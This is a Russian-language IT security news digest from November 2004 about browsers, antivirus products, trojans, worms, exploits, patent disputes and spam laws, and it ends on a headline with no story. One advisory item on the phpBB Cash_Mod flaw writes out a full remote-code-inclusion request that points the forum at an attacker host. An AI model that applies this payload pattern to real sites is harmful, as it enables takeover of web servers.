Компания AOL решила возобновить разработку популярного некогда интернет-браузера Netscape. Как сообщает интернет-издание BetaNews, концептуально за основу нового варианта Netscape будет взят браузер Firefox, который, как и предыдущие версии Netscape, основан на ядре Mozilla. Ядро и первичный интерфейс были изначально созданы группой разработчиков во главе с Марком Андрессеном (Marc Andreessen), которые образовали компанию Netscape Communications, вошедшую затем в состав AOL. Впоследствии на базе сайта браузера Netscape.com был создан медиапортал, который стал работать в рамках холдинга AOL Time Warner. Последнее на настоящий момент обновление Netscape имеет индекс 7.2 и произошло оно в августе этого года. Перед этим версия c индексом 7.0 выходила в августе 2002 года. В последнее время работа над проектом почти не велась, так как он окончательно потерял позиции на рынке, а у AOL начались финансовые проблемы. Издавались лишь "заплатки", исправлявшие уязвимости в системе безопасности. Тем не менее, в последнее время MSIE начал терять рынок с появлением новых, более удобных продуктов, среди которых на настоящий момент лидером стал бесплатный Firefox группы Mozilla Foundation. AOL обещает представить первый релиз предварительной версии нового Netscape 30 ноября. Вместе с тем, ранее AOL уже объявляла о работах над другим собственным браузером под названием AOL Browser. Предполагалось, что он станет "надстройкой" над ядром MSIE, добавив к нему свои функции. О том, что будет происходить с AOL Browser после возобновления работ над Netscape, не поясняется.
Lenta.Ru

18/11/2004 13:21 Trend Micro представила новые антивирусы
Компания Trend Micro, разработчик антивирусного ПО, объявила о расширении семейства приложений Trend Micro Network VirusWall для предотвращения эпидемий сетевых червей и представила продукты Network VirusWall 2500 и Network VirusWall 300. Network VirusWall 2500 является надстройкой к Network VirusWall 1200 и позволяет управлять безопасностью комплекса сетевых сегментов и серверов через единое устройство. Поддержка Gigabit Ethernet обеспечивает менеджеров по безопасности необходимыми возможностями по защите современных широкополосных сетевых инфраструктур. Network VirusWall 300 предназначен для обеспечения безопасности устройств с непрерывным доступом к данным, таких как банкоматы и терминалы самообслуживания. Блокируя несанкционированный доступ к подобным устройствам, Network VirusWall 300 создает двусторонний барьер, который не дает пользовательским терминалам стать источником инфекции для внутренних и внешних сетей, к которым они подсоединены. Trend Micro также выпустила новую версию вирус-сканера HouseCall. Вирус-сканер позволяет осуществлять тестирование зараженности компьютера вирусами, интернет-червями и контролировать безопасность системы. Новая версия HouseCall, построенная на Java, предлагается бесплатно для работы на популярных операционных системах и браузерах.
Подробности

18/11/2004 15:24 Новая модификация трояна Banker
"Лаборатория Касперского" сообщает об обнаружении новой модификации вредоносной программы Banker, предназначенной для кражи конфиденциальной информации о пользователях интернета, например, банковских счетов или номеров кредитных карт. После запуска троян Banker.U, занимающий в распакованном виде около 75 кб, создает в системном каталоге Windows два файла с расширениями DLL и ЕХЕ, вносит ряд изменений в реестр и затем открывает "черный ход" в систему. Кроме того, вредоносная программа сканирует все доступные сетевые и интернет-ресурсы, собирая информацию финансового характера. Похищенные данные впоследствии отправляются на веб-сайт, адрес которого прописан в коде трояна.
Описание

18/11/2004 16:15 Обзор ОС OpenBSD 3.6
29 октября команда разработчиков проекта OpenBSD, в лице Theo de Raadt, объявила о выходе новой версии это ОС - 3.6, в которой добавлена дополнительная поддержка нового железа, включена поддержка многопроцессорности (SMP) для платформ i386 и amd. Также включено около 200 новых приложений в дерево портов. На сайте NewsForge Jem Matzan опубликовал краткий обзор OpenBSD 3.6.
Обзор

18/11/2004 16:55 Обновление IE возможно, утверждает Microsoft
Microsoft, которую призывают добавить в Internet Explorer новые функции, говорит, что это можно делать через имеющийся в браузере механизм подключения дополнительных модулей. Компания неуклонно стояла на том, что она не станет выпускать новую самостоятельную версию IE, последнее обновление которой состоялось в августе 2001 года. Испытав ряд кризисов с безопасностью IE, Microsoft выпустила серьезный апгрейд вместе с Windows XP Service Pack 2. Но он доступен только пользователям Windows ХР — то есть примерно половине мира Windows. Microsoft утверждала, что она слишком занята работой над многострадальной операционной системой Longhorn, чтобы возвращаться к разработке браузера. Теперь же компания говорит, что способность браузера к наращиванию позволяет добавлять в IE функции, которые заказчики считают «сверхвысокоприоритетными». «Это способ для Microsoft наращивать IE, — сказал директор Microsoft по управлению продуктами Windows Гари Скейр. — В центре нашего внимания находится Longhorn, и ко всему, что от него отвлекает, мы относимся с большой осторожностью. Надо сказать, что механизм наращивания очень надежный, и разрабатывать модули для него чрезвычайно легко. Это путь, хотя мы и не планировали это делать». Скейр, который уже говорил о возможности наращивания IE (об этом сообщалось в Microsoft Watch), отметил, однако, что не любые функции можно добавить к IE в виде дополнений. Например, с функцией Tabbed browsing это не пройдет. На сайте Windows Marketplace компании недавно открылся раздел, посвященный дополнениям для IE. Среди них только один — MSN Toolbar — является продуктом Microsoft, хотя в списке есть и устаревший уже Service Pack 1. Скейр сказал, что новый сайт дополнений живет активной жизнью, и с момента его открытия предложено уже около тысячи модулей для IE.
Подробности

18/11/2004 17:09 DVD-версия FreeBSD 5.3 выложена на FTP
На ftp.linuxcenter.ru выложен дистрибутив FreeBSD 5.3 на 2DVD, собранный командой ЛинуксЦентра, сообщает linux.org.ru. В этот набор включены все пакеты с официального FTP-сервера FreeBSD.org, сопроводительная документация на русском языке (каталог russian), а также полный CVS репозиторий FreeBSD (ncvs.tgz) от 11 ноября 2004 года. Содержимое дисков: DVD#1 - Install DVD + пакеты + сопроводительная документация на релиз. DVD#2 - Live FileSystem FixIT DVD + пакеты + CVS репозиторий проекта FreeBSD от 11 ноября 2004 года.
Скачать

18/11/2004 17:32 Регистратора домена отныне можно менять
Организация ICANN ввела в действие новую политикиу передачи доменных между регистраторами. Отныне владельцы доменных имен смогут выбирать регистратора по своему усмотрению подобно тому, как в случае наличия соответствующих соглашений можно сохранять номер мобильного телефона при смене оператора. Идея в том, чтобы пользователи смогли выбирать оптимальные для себя ассортимент услуг и цены, способствуя тем самым конкурентной борьбе между регистраторами. В ICANN также сообщают, что приняли меры по защите от несанкционированной передачи доменных имен: при передаче регистратор обязан удостоверить личность владельца имени и перед внесением любых изменений должен использовать утвержденную процедуру авторизации, обеспечивающую получение согласия индивидуума или организации. Регламентирован также процесс разрешения диспутов между регистраторами, могущих возникнуть в ходе выполнения запросов на передачу домена. Дополнительно введена услуга Redemption Grace Period Service - 30-дневный период, в течение которого держатель доменного имени может потребовать его назад в случае непреднамеренного удаления из базы данных регистратора.
"Открытые системы"

18/11/2004 19:36 Уязвимость в модуле Cash_Mod форума phpBB2
Обнаружена серьезная уязвимость в модуле Cash_Mod(всех версий) форума phpBB. Уязвимость заключается в возможности злоумышленнику выполнить произвольный PHP код. Такую возможность дает неправильное описание переменных "$phpbb_root_path" и "$phpEx" в файле "admin/admin_cash.php", значения которых может изменить любой пользователь выполнив GET или POST запрос. В итоге злоумышленник может использовать любой PHP код, полученный с удаленного сайта, указав необходимый путь при помощи упомянутых ранее параметров. Например, выполнение произвольного кода находящегося в файле "/includes/functions_cash./test.php" на веб-сервере "http://crackersite/" будет выглядеть так:
"http:/host/phpbb2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://crackersite/&phpEx=/test.php".
По приведенной ниже ссылке, вы сможете узнать о способе ликвидации этой уязвимости.
SecurityFocus BUGTRAQ

19/11/2004 09:30 Билл Гейтс получает 4 миллиона писем в день, большинство из них - спам
Глава Microsoft Билл Гейтс (Bill Gates) получает около четырех миллионов электронных писем в день. Об этом в четверг сообщил исполнительный директор корпорации Стив Болмер (Steve Ballmer) в ходе выступления на Азиатско-тихоокеанском форуме по высоким технологиям в Сингапуре. Болмер пояснил, что лично Гейтс всю свою почту не читает - в корпорации имеется специальное подразделение, которое занимается фильтрацией писем, направленных главе Microsoft и самому богатому человеку в мире. Большинство писем, отметил Болмер, являются спамом. По всей видимости, Гейтс из всех пользователей Интернета получает наибольшее количество спама. Сам Болмер, второй человек в Microsoft, также получает очень много ненужных писем, однако они также подвергаются фильтрации. Как передает агентство France-Presse, Болмер заявил, что из всего спама, присылаемого на его адрес, через фильтры удается "прорваться" примерно 10 письмам такого рода в день.
Lenta.Ru

19/11/2004 09:56 Microsoft засудит пользователей Linux
Исполнительный директор Microsoft Стив Баллмер пригрозил правительствам стран Азии длинной чередой судебных исков, если те вздумают предпочесть продуктам Microsoft ПО с открытым кодом. Российским же госструктурам подобные угрозы не предъявят: именно Microsoft доверили создание системы электронного правительства нашей страны. Выступая на форуме руководителей правительств азиатских стран в Сингапуре, Стив Баллмер заявил, что создатели Linux нарушили, в общей сложности, больше 228 патентов. В детали вдаваться он не стал. «Рано или поздно во все страны, входящие в ВТО (Всемирную Торговую Организацию), придет кто-нибудь и напомнит о необходимости заплатить за пользование интеллектуальной собственностью», - указал он. В Азиатско-Тихоокеанском регионе настойчивая борьба Microsoft с конкурентом способна ввергнуть в панику многих: так, в прошлом месяце министерство обороны Сингапура перевело более 20 тыс. своих ПК на ПО с открытым кодом вместо продуктов Microsoft. Другие страны региона от Сингапура не отстают. Китай, Япония и Южная Корея в этом году договорились начать совместную разработку программного обеспечения с открытым кодом, которое работало бы под управлением операционной системы Linux. Китайское правительство занимает особенно жесткую позицию, полагая, что зависимость от продуктов Microsoft представляет собой весьма серьезную угрозу для страны. Существует опасение, что в коде Windows имеются скрытые возможности, позволяющие соответствующим службам США проникнуть в китайские компьютерные сети и вывести их из строя – например, в случае начала войны с Тайванем. Слухи о небезопасности программных продуктов Microsoft лично развеял сам Стив Балмер. «Мы полагаем, - заявил он, - что наши программные продукты намного безопаснее, чем программы с открытым кодом. Их большая безопасность основывается на том, что за ними стоим мы. Мы поправляем их, поскольку мы создали их. А о том, кто же на самом деле создал программные продукты с открытым кодом, в точности не знает никто».
CNews

19/11/2004 10:01 Обнаружен простейший DOS-вирус Ng.695
Компания Symantec предупреждает о появлении малоопасного DOS-вируса Ng.695. Эта простейшая резидентная вредоносная программа ищет на доступных носителях и инфицирует исполняемые файлы с расширением СОМ. При этом, однако, вирус игнорирует файлы, имена которых начинаются на "СО", "SO" и "М", а также файлы, на месте четвертого символа в имени которых стоит буква "m". После запуска пораженные программы выводят на дисплей сообщение об ошибке со следующим текстом: "Bad command or file name" (неправильная команда или имя файла).
Описание

19/11/2004 10:20 Увеличение безопасности Apache используя SELinux
Опять радует полезными ссылками opennet.ru. В статье "Understanding and Customizing the Apache HTTP SELinux Policy" описываются пути использования SELinux в Linux дистрибутиве Fedora Core, для дополнительной защиты системы от возможных проблем безопасности в apache и скриптах пользователей.
Статья

19/11/2004 10:44 В Рунете начались продажи книги Кевина Митника
В России начались продажи книги "Искусство обмана", выпускаемой издательством "АйТи-Пресс" Академии АйТи, сообщает Internet.Ru. Автор книги – легендарный хакер Кевин Митник открывает секреты противостояния самой серьезной угрозе безопасности – человеческой природе. The Art of Deception доказывает, что все может пасть жертвой социоинженера. Книга объясняет, как просто бывает перехитрить всех защитников и обойти технологическую оборону. Сейчас Кевин Д. Митник – консультант по безопасности различных корпораций по всему миру и соучредитель консалтинговой компании Defensive Thinking ("Защитное Мышление") расположенной в Лос-Анжелесе. Кевин Д. Митник выступал в Сенате перед правительственным комитетом с докладом о необходимости разработки законодательной базы для обеспечения безопасности информационных систем правительства. Его статьи публиковались в центральных новостных и профессиональных журналах. Кевин и его соавтор, Бил Саймон, рассказывают множество историй, которые сами по себе интересны и раскрывают секреты андеграунда социальной инженерии. Каждая история комментируется авторами, которые дают практические советы по защите от атак, по обеспечению корпоративной безопасности и снижению информационной угрозы. Книгу можно заказать в Интернет-магазине "Болеро". Некоторые главы книги имеются на русском языке на сайте Дмитрия Леонова bugtruq.ru.
Страница заказа

19/11/2004 11:54 Интернет-газету ForUm атаковали хакеры
Украинское общественно-политическое интернет-издание ForUm атаковали хакеры. Об этом сообщил главный редактор издания Виталий Кустов, передает «Итар-Тасс». Он назвал «не случайностью, что интернет-газета была атакована накануне второго тура президентских выборов», который состоится 21 ноября. «Объективны мы или нет — судить читателю, но то, что мы мешаем команде одного из кандидатов в президенты, рвущейся к власти путем погромов в ЦИК, путем массовых фальсификаций на Западной Украине в ходе первого тура выборов и постоянных политических спекуляций — это не вызывает сомнений», — заявил Кустов. «Мы — за честные выборы. И это, естественно, не нравится тем, кого мы заслуженно критикуем», — подчеркнул он. Кустов сообщил, что интернет-газету ежедневно читают более 12 тыс человек. С момента основания ForUm посетили почти 36 млн человек. Интернет-издание отстаивает интересы кандидата в президенты, премьер-министра Виктора Януковича, подвергая резкой критике кандидата от оппозиции Виктора Ющенко.
"ИТАР-ТАСС"

19/11/2004 12:06 Борьба со спамом в России выходит на государственный уровень
В Москве объявлено о создании Российской Национальной коалиции против спама. В нее вошли семь ведущих компаний (российское представительство Microsoft, почтовая служба Mail.ru, портал Rambler, служба e-mail-рассылок Subscribe.ru, агентство "Ашманов и партнеры", "Голден Телеком" и софтверная компания "Лаборатория Касперского"), считающих себя способными бороться с несанкционированными интернет-рассылками на законодательном уровне. По информации "Rambler", спам занимает в России до 75% почтового трафика. Этот показатель будет увеличиваться, так как спам - самый дешевый способ рекламирования товаров и услуг, а надежного технического решения проблемы не существует. В законодательные органы уже активно поступают законопроекты, ставящие рассылку спама вне закона. Так, в проекте Федерального Закона "О правовом регулировании оказания Интернет-услуг" в ст.33 в обязанность отправителя при отправке рекламных сообщений вменяется указывать в теме сообщения строку "на правах рекламы", а п.1 ст.37 содержит следующее положение: "Систематическая умышленная отправка пользователем Интернет по адресам электронной почты данных, не запрошенных получателем и содержащих рекламу, то есть, умышленная передача по адресам электронной почты два и более раз в месяц данных, содержащих рекламу адресату, не передававшему запрос на получение этих данных влечет административный штраф в размере от трех до пяти минимальных размеров оплаты труда, а также возмещение убытков, которые возникли в результате такой передачи данных, если иная ответственность не установлена настоящим законом и иными правовыми актами". В п.2 данной статьи устанавливается несколько более значительная ответственность за повторное административное нарушение, а в ст.38 - солидарная ответственность провайдера за почтовые рассылки отправителя. В поддержку законопроектов «спам вне закона» выступает также Ассоциация компаний, предоставляющих услуги рассылки рекламы по электронной почте (DMA - Ассоциация директ-маркетинга).
Crime-Research.ru

19/11/2004 12:20 Эксплоит уязвимости Apache 2.0
Опубликован эксплоит уязвимости, обнаруженной в Apache версий 2.0.35-2.0.52. Прредназначен для компиляции на платформе Linux. Работа эксплоита заключается в последовательной посылке большого количесва строк (8000), каждая из которых состоит из 8000 "пробелов". В результате атаки наблюдалось исчерпание всей доступной памяти (RAM) cервера с дальнейшим отказом - DoS. Об уязвимости первоначально сообщил в списке "FullDisclosure" Chintan Trivedi, он же привёл первую версию эксплоита.
Описание
Вторая версия эксплоита

19/11/2004 13:31 Анализ кода трояна Bofra/MyDoom.AG/AH
Bryan Burns опубликовал результаты анализа исходного кода трояна под названием Bofra (он же MyDoom.AG/AH), который был обнаружен в диком виде 8 ноября.
Анализ трояна

19/11/2004 13:58 В России осужден известный вирусописатель
22 октября 2004 года в г. Ижевске был вынесен приговор по делу Е. А. Сучкова, известного в вирусописательской среде под псевдонимом "Whale", сообщает "Лаборатория Касперского". Обвинение было выдвинуто по 273-й статье Уголовного Кодекса РФ. Евгений Сучков был обвинен в создании двух вредоносных программ - компьютерных вирусов Stepar и Gastropod, а также в публикации исходных кодов этих вирусов и их исполняемых файлов на различных интернет-сайтах, в том числе на сайте известной международной вирусописательской группы 29A. В ходе судебного разбирательства Евгений полностью признал свою вину и оказал значительную помощь следствию. В результате он был признан виновным в совершении преступления, предусмотренного ч. 1 ст. 273 УК РФ и приговорен к штрафу в размере 3000 рублей. "Столь мягкое наказание объясняется тем, что у следствия не имелось заявлений от пострадавших в результате действий созданных Сучковым вирусов, - отмечает антивирусный эксперт "Лаборатории Касперского" Александр Гостев. - С другой стороны, не может не радовать тот факт, что это фактически первый уголовный процесс в России, в результате которого к ответственности был привлечен широко известный автор вирусов, состоявший в печально знаменитой международной вирусописательской группе 29A".
VirusList

19/11/2004 14:41 Антивирусы: AntiVir Personal Edition
Выпущена свежая версия антивируса AntiVir Personal Edition. Программа полностью бесплатна для частного использования и обладает практически теми же возможностями, что и платные антивирусы. AntiVir Personal Edition знает и умеет бороться с более чем 50 тысячами вирусов, имеет возможность отслеживать вирусную активность, а вирусную базу программы можно пополнять через Интернет. Объём дистрибутива AntiVir Personal Edition v.6.28.00.10 составляет 4.4 МБ. Поддерживаемые ОС - Windows 9x/ME/2000/XP.
Cкачать

19/11/2004 15:28 "СКИФ К-1000" - в сотне самых мощных компьютеров мира
Объединенный институт проблем информатики Национальной академии наук Беларуси, Институт программных систем Российской академии наук, компания "Т-Платформы" и корпорация AMD объявили о создании сверхпроизводительного суперкомпьютера "Скиф К-1000" в рамках суперкомпьютерной Программы "Скиф" Союзного государства России и Беларуси. Кластер "Скиф К-1000" на базе 576 процессоров AMD Opteron создан осенью 2004 г. по проекту Объединенного института проблем информатики Национальной академии наук Беларуси (ОИПИ НАН Беларуси) и установлен в Минске. В разработке суперкомпьютера "Скиф К-1000" принимали участие ОИПИ НАН Беларуси (Минск), НИИ ЭВМ (Минск), компания "Т-Платформы" (Москва) и ИПС РАН (Переславль-Залесский). Разработка и производство вычислительных узлов кластера, а также сборка и установка тестовой конфигурации системы осуществлены российской компанией "Т-Платформы" в сотрудничестве с ИПС РАН. Пиковая производительность кластера составляет 2.5 терафлопа, реальная производительность на тесте Linpack - 2,032 терафлопа. Суперкомпьютер "Скиф К-1000" является наиболее мощной из всех вычислительных систем, установленных на территориях России, СНГ и Восточной Европы, и входит в число 100 наиболее мощных компьютеров мира. "Скиф К-1000" занял 98-ю позицию в новой редакции мирового рейтинга суперкомпьютеров Top500, изданной 9 ноября 2004 года. Кластер "Скиф К-1000" может применяться для решения любых задач, требующих высокопроизводительных вычислений в наукоемких отраслях промышленности, биотехнологиях, медицине, генетике, геологоразведке, для контроля за окружающей средой, прогнозирования погоды и многих других задач.
Подробности

20/11/2004 12:44 I-Worm.Sober.i: распространение нового червя угрожает пользователям интернета
"Лаборатория Касперского" сообщает об обнаружении нового опасного интернет-червя "Sober.i". Вредоносная программа распространяется через интернет в виде вложений в зараженные электронные письма. Помимо функций, стандартных для данного типа вредоносных программ, деструктивный эффект действия "Sober.i" заключается в содержащемся в теле червя механизме удаленного запуска любых файлов по желанию злоумышленника. В настоящее время антивирусные эксперты "Лаборатории Касперского" получают большое число сообщений об обнаружении червя от пользователей западноевропейского региона. "Sober.i" использует обычную для сетевых червей процедуру запуска: активизация червя производится при самостоятельном открытии пользователем файла, приложенного к зараженному письму. После запуска червь выводит на экран ложное сообщение об ошибке: "WinZip Self-Extractor. WinZip_Data_Module is missing ~Error". Затем он создает в системном каталоге Windows два файла с произвольными именами, формируемым из встроенного в тело червя списка. Данные файлы являются основными компонентами червя, производящими сбор адресов и рассылку копий по электронной почте. Затем "Sober.i" копирует себя в системный каталог Windows и регистрирует себя в ключе автозапуска системного реестра. Помимо этого, он создает несколько дополнительных копий и вспомогательных файлов с разными именами в системном каталоге Windows. Для своего размножения "Sober.i" сканирует файловую систему пораженного компьютера в поисках
адресов электронной почты и рассылает себя по обнаруженному списку адресатов. Для отправки почты червь использует собственный SMTP-сервер. Зараженные "Sober.i" письма имеют произвольные темы и тексты на немецком или английском языке (несколько десятков различных вариантов), которые случайным образом составляются из нескольких частей. Имя вложения также может быть с различными расширениями: "pif", "zip", "bat".
Описание

20/11/2004 13:52 Microsoft и Dell снабдят ВВС США программным обеспечением
Корпорации Microsoft и Dell в течение более чем шести лет будут поставлять программное обеспечение в американские военно-воздушные силы, передает Reuters. Сумма сделки превышает 500 миллионов долларов. По контракту Microsoft обязуется поставлять в ВВС США серверное ПО, а также заниматься технической поддержкой и обновлениями. Dell в свою очередь обязуется предоставить более 525 тысяч лицензий на использование пакетов программ для персональных компьютеров. Благодаря тому, что вся ответственность за эту работу будет возложена на две компании, ВВС стандартизируют конфигурации своего ПО во всех структурах. До этого множество подобных соглашений заключалось с разными фирмами. Военные отмечают, что новый подход сделает систему централизованной, что незамедлительно скажется должно сказаться на процессах управления и планирования в военно-воздушных силах.
Lenta.Ru

20/11/2004 14:20 Код Java сможет изменять любой желающий
Компания Sun Microsystems объявила о своем намерении сделать код грядущей Java 6 Mustang доступным для всех желающих, cообщает "Компьюлента". Собственно, код уже доступен на официальном сервере компании, но в данный момент это лишь первая версия. Сделан подобный шаг был для того, чтобы любой желающий мог присоединиться к команде разработчиков и принять участие в создании Java 6. Однако с публикацией кода Java под свободной лицензией это событие вовсе не связано. Пока в Sun Microsystems на подобные уступки не готовы и опасаются, что, разрешив всем желающим модифицировать виртуальную машину Java, они, тем самым, поспособствуют созданию множества несовместимых версий. Подобное положение могло бы подорвать репутацию языка - код на Java знаменит тем, что, единожды написанный, он будет запускаться на любой платформе. Так что на данный момент весь код, созданный независимыми программистами для проекта будет добавляться в Java 6 лишь при том условии, что права на него перейдут Sun Microsystems. Руководители проекта считают, что это решение будет оптимальным: программисты со всего мира получат возможность влиять на развитие платформы, что, учитывая контроль со стороны Sun, должно лишь пойти на пользу Java. Подобным образом до сих пор разрабатывались API-библиотеки для Java, и такая схема работы неплохо себя зарекомендовала.
Подробности

20/11/2004 14:43 Oracle пересмотрела график выпуска патчей
Пресс-служба Oracle оповестила об изменении графика выпуска обновлений для ПО. В следующем году патчи будут выпускаться ежеквартально, а не ежемесячно, как было запланировано ранее. Это касается обновлений для таких программных средств, как Oracle Application Server, Database, E-Business Suite, Enterprise Manager и Collaboration Suite. Согласно новому плану, патчи в 2005 г. выйдут 18 января, 12 апреля, 12 июля и 18 октября. По мнению руководства Oracle, изменение графика будет способствовать более планомерному системному администрированию, когда обновления не являются «нежданным сюрпризом», как в настоящее время. Специалисты корпорации утверждают, что порядок выпуска патчей в следующем году является балансом между своевременным обеспечением потребителей «заплатами» и упорядоченным управлением ИТ-инфраструктурой. Заявление Oracle последовало через неделю после того, как руководство корпорации отказалось предоставить информацию о недавно найденной уязвимости, за что подверглось со стороны Gartner резкой критике и обвинениям в безразличии к своим пользователям, сообщил Vnunet.
Vnunet

20/11/2004 15:41 США: за файлообмен к уголовной ответственности
Звукозаписывающие студии и кинокомпании требуют, чтобы Конгресс США одобрил законопроект, предусматривающий уголовное наказание в виде тюремного заключения для пользователей пиринговых сетей, сообщает Washington Post. Проект закона уже обрел противников, которые считают, что от него могут несправедливо пострадать рядовые потребители. В оппозиционную группу вошли американская Ассоциация производителей бытовой электроники, компания Verizon Communications, группа по защите гражданских свобод Public Knowledge и другие. Пакет документов, состоящий из восьми законопроектов, рассматривается развлекательной индустрией в качестве одной из мер борьбы с интернет-пиратством. Согласно законопроекту Piracy Deterrence and Education Act, те любители файлообмена, кто выложил в интернете 1000 или более музыкальных композиций, могут лишиться свободы сроком на пять лет. К уголовной ответственности будут привлекаться и те, кто записывает фильмы во время сеансов в кинотеатрах. Этот документ уже получил одобрение Палаты представителей Конгресса США в текущем году. Второй проект закона, PIRATE Act, позволяет Министерству юстиции США взыскивать убытки в гражданском порядке с пользователей пиринговых сетей. В настоящее время судебное преследование возможно только за нарушение копирайта. По данным Американской ассоциации звукозаписывающих компаний (RIAA), чем больше популярность пиринговых сетей, тем сильнее сокращаются продажи и доходы звукозаписывающей индустрии. В частности, объемы продаж CD уменьшились с 13,2 млрд. долларов США в 2000 году до 11,2 млрд. долларов США в 2003 году. И хотя в текущем году CD продавались лучше, но показатели все равно не достигнут результатов 2000 года.
Crime-Research.Ru

20/11/2004 16:04 OSDL: Критика Linux со стороны MS безосновательна
Стив Баллмер (Steve Ballmer), глава Microsoft, на днях рапространил сообщение о том, что Linux нарушает 228 патентов. Но данное заявление является лишь искаженным представлением заключений, к которым в августе этого года пришла начинающая компания по защите пользователей Linux от исков по вопросам патентов. Стюарт Коэн (Stuart Cohen), глава Open Source Development Labs (OSDL), уже подготовил и опубликовал ответ на высказывание Баллмера. В нем Коэн подчеркнул, что OSDL и другие компании (HP, Red Hat, Novell, IBM) предоставляют Linux-пользователям защиту от судебных исков со стороны желающих доказать нарушение Linux'ом прав на какую-либо интеллектуальную собственность и патенты. За последние 18 месяцев множество компаний и просто индивидуумов, испуганных успехом Linux, предпринимали попытки доказать, что открытая операцонная система нарушает патенты на другое программное обеспечение. Что примечательно, ни один из этих истцов не упоминал, какие же патенты нарушает Linux.
nixp.ru

20/11/2004 16:28 Ожидается ядро 2.7
Большой объем накопившихся за минувший год патчей означает, что в скором времени ядро будет вновь разветвлено на стабильную (2.6) и development-версии (2.7). Об этом сообщил Эндрью Мортон (Andrew Morton) на конференции SDForum. Linux 2.7 будет создан, когда в текущем варианте ядра не останется место для новых "заплаток", сказал г-н Мортон.
Подробности

20/11/2004 16:54 Microsoft использует Halo 2 для борьбы с хакерами?
Похоже, что Microsoft применяет свою триумфальную игру Halo 2 в качестве орудия борьбы против мод-чипов и других способов взлома видеоигровой консоли Xbox. Сотни владельцев Xbox жалуются в онлайновых форумах, что после попытки поиграть в Halo 2 в онлайне через модифицированную консоль их перестали пускать в службу онлайновых игр Microsoft Xbox Live. Представитель Microsoft не стал говорить, какие приняты меры защиты и приняты ли они вообще. «Microsoft внимательно прислушивается к сообществу геймеров Xbox Live и предпринимает шаги, необходимые для того, чтобы пользователям никто не мешал, — говорится в заявлении компании. — Наша цель — обеспечить им безопасную, гладкую и честную онлайновую игру. Никто не имеет права манипулировать системой в ущерб другим». «Мод-чипы», предлагаемые на сером рынке дополнения, позволяющие игровым консолям работать с импортированными дисками, пиратскими играми и самодельным ПО, появились в обращении вскоре после выхода игровой приставки Xbox четыре года назад. Хакеры, оснастившие свои системы мод-чипами и другими дополнениями, такими как жесткие диски большего размера, заставляют консоли выполнять всевозможные несанкционированные трюки, включая исполнение Linux-ПО и работу в качестве цифровых медиацентров. Microsoft и другие производители оборудования давно борются с мод-чипами, главным образом потому, что эти чипы способствуют распространению пиратских игр. Своей кульминации борьба Microsoft достигла два года назад, когда компания обратилась в Министерство юстиции, и федеральные власти закрыли веб-сайт, где продавались мод-чипы и осуществлялся обмен нелегальными копиями игр.
ZDNet

20/11/2004 17:06 Поддельный security bulletin от Red Hat
Волна писем с фальшивыми патчами, столь знакомых пользователям Windows, докатилась и до Linux, cообщает bugtraq.ru. Начиная с пятницы, по сети стало бродить письмо, предупреждающее пользователей Linux о наличии в Red Hat 7.2-9.0 и Fedora Core критической уязвимости, позволяющей удаленному пользователю получить полный доступ к атакуемой системе. К письму прилагается ссылка на "патч", призванный устранить данную уязвимость, последствия установки которого вполне очевидны.
Подробнее

20/11/2004 17:28 Эксплоит уязвимости Windows
Опубликован эксплоит уязвимости, обнаруженной в Windows при попытке открытия ZIP-фолдера (MS04-034). Написан на С++ для win32.
Исходный код

20/11/2004 18:06 Выход phpBB 2.0.11
Paul S. Owen от имени команды разработчиков популярного ПО для ведения форумов на языке скриптов PHP под названием phpBB, cообщил о выпуске новой версии этого популярного продукта - 2.0.11. После опубликования информации об уязвимости в phpBB в Рунете (и не только) началась волна взлома форумов. В письме с анонсом новой версии автор просил в будущем перед опубликованием эксплоита ставить в известность авторов программного продукта.
Cайт phpBB

21/11/2004 10:36 Литовский суд разрешил "Кавказ-центру" вернуться
В субботу второй участковый суд Вильнюса постановил снять все ограничения с деятельности сайта чеченских сепаратистов "Кавказ-центр". "Суд признал противоречащими законам и международным нормам действия правительства и Департамента госбезопасности (ДГБ) Литвы, блокировавших деятельность сервера, обслуживавшего интернет-сайт", - цитирует агентство "Интерфакс" литовского правозащитника Виктораса Пяткуса. Ресурс на законных основаниях может без ограничений работать на территории Литвы в течение года, то есть пока Конституционный суд не решит, не противоречит ли деятельность "Кавказ-центра" в Литве основному закону государства. Суд также отложил на 17 декабря окончательное рассмотрение дела о правомочности постановления Правительства Литвы, руководствуясь которым ДГБ блокировал работу сепаратисткого сайта. Решение о прекращении его деятельности было принято в сентябре на заседании Совета обороны, проведенном президентом Литвы Валдасом Адамкусом. "Кавказ-центр" был закрыт литовскими властями 18 сентября. В начале октября ресурс якобы переехал в Грузию, а затем в Финляндию и какое-то время работал оттуда. 11 октября сайт был вновь закрыт по требованию финской полиции. Примерно через месяц шведский интернет-провайдер Рort80.Se предоставил "Кавказ-центру" хостинг в Швеции. Судя по Whois-сервису, ресурс все еще находится в этой стране.
Lenta.Ru

21/11/2004 11:45 Индия построит собственную "Силиконовую долину"
В индийском штате Керала (Kerala) на территории в 400 гектаров будет построен город, в котором разместятся рабочие центры ИТ-компаний со всего мира, передает Associated Press. Привлечь иностранный бизнес к участию в проекте, названном Смарт-Сити (Smart City), местные власти собираются обещаниями серьезных льгот. Выделенный под строительство участок находится недалеко от города Кочин (Cochin). Свободное пространство администрация штата собирается заполнить офисами, жилыми зданиями и школами, а в завершение сделать там еще и развлекательный комплекс. Компания, открывающая свое представительство в Смарт-Сити, получит возможность без всякой регистрации и лицензирования обзавестись собственным магазином. Однако пока неизвестно будет ли там создана свободная торговая зона. С индийского стороны в городе должны быть представлены разработчики программного обеспечения и предприятия, специализирующиеся на установке и обслуживании call-центров.
Подробности

21/11/2004 12:37 IBM установила рекорд производительности серверов
Новый Unix-сервер IBM верхнего уровня на процессорах Power5 победил в сравнительных испытаниях серверов, обслуживающих крупные базы данных. Сервер IBM eServer p5-595 стоимостью $16,7 млн показал 3,21 млн транзакций в минуту на тестах TPC-C организации Transaction Processing Performance Council. С четверга этот сервер доступен для широкого круга заказчиков. Полученный результат побил два предыдущих рекорда: рекорд быстродействия кластера, поставленный машинами Hewlett-Packard на процессорах Itanium с операционной системой Red Hat Linux, который составил 1,18 млн транзакций в минуту, и рекорд быстродействия отдельной системы, установленный сервером IBM Power4 с операционной системой AIX на уровне 1,03 млн транзакций в минуту. Система IBM содержит 32 процессора Power5 1,9 ГГц, у каждого из которых по два вычислительных ядра; 2 Гбайт оперативной памяти; ПО управления базами данных IBM DB2; а также 6548 жестких дисков в 45 системах хранения данных DS4500 и 490 дополнительных системах DS4000.
ZDNet

21/11/2004 12:59 Новая программная Linux-платформа от NEC и Panasonic
